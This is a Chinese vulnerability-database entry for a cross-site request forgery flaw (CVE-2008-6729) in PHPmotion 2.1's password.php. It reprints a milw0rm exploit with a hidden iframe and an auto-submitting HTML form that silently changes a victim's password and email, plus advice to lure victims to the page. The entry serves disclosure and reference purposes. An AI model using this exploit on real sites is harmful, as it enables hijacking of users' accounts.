phpmotion 'password.php'多个跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117125 漏洞类型 跨站请求伪造
发布时间 2008-12-23 更新时间 2009-04-20
CVE编号 CVE-2008-6729 CNNVD-ID CNNVD-200904-380
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7557
https://www.securityfocus.com/bid/84501
https://cxsecurity.com/issue/WLB-2009040209
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-380
|漏洞详情
PHPmotion2.1及之前版本中的password.php存在多个跨站请求伪造漏洞。远程攻击者可以借助密码或电子邮件地址参数,劫持对任意用户请求进行的身份认证。这些请求用于修改一个帐户。
|漏洞EXP
PHPmotion <= 2.1 CSRF vulnerability

Author: Ausome1
Email: Ausorme1@gmail.com
Website: http://www.enigmagroup.org
Description: Change a member's password and/or email.
---------------------------------------------------------------------------------------------------


Social engineer a PHPMotion member to come to your web page with the following hidden iframe on 
there, which pulls in the evil script from pwned.html. This will change the victim's password and email, 
using their credentials.

We use a hidden iframe so the victim doesn't know their password was changed till it's to late. In 
the pwned.html file I recreated the form on the PHPMotion change password/email. Javascript is used 
to submit the form on page load.

Hidden iframe code:

	<iframe id="hiframe" style="visibility:hidden;display:none" src="pwned.html"></iframe>


Source of pwned.html file:

	<html>
	<head></head>
	<body onload="document.forms.invite.submit();">
	<form name="invite" action="http://demo.phpmotiontemplates.com/v2/default/password.php" method="post" class="UpdateProfileForm">
		<input type="hidden" name="submitted" value="yes" />
		<input type="password" name="password" value="password123" />
		<input type="text" name="email_address" size="36" value="NotYourEmail@anymore.com" />
		<input type="submit" value="Update settings" name="invite_fr" />
	</form>
	</html>


Once your victim has visited your evil page, You may now be able to log into their PHPMotion account, 
using password "password123" and their email will be "NotYourEmail@anymore.com".

# milw0rm.com [2008-12-23]
|受影响的产品
PHPmotion PHPmotion 2.1 PHPmotion PHPmotion 2.0 PHPmotion PHPmotion 1.0
|参考资料

来源:XF
名称:phpmotion-password-csrf(47585)
链接:http://xforce.iss.net/xforce/xfdb/47585
来源:MILW0RM
名称:7557
链接:http://www.milw0rm.com/exploits/7557
来源:SECUNIA
名称:33309
链接:http://secunia.com/advisories/33309
来源:OSVDB
名称:50999
链接:http://osvdb.org/50999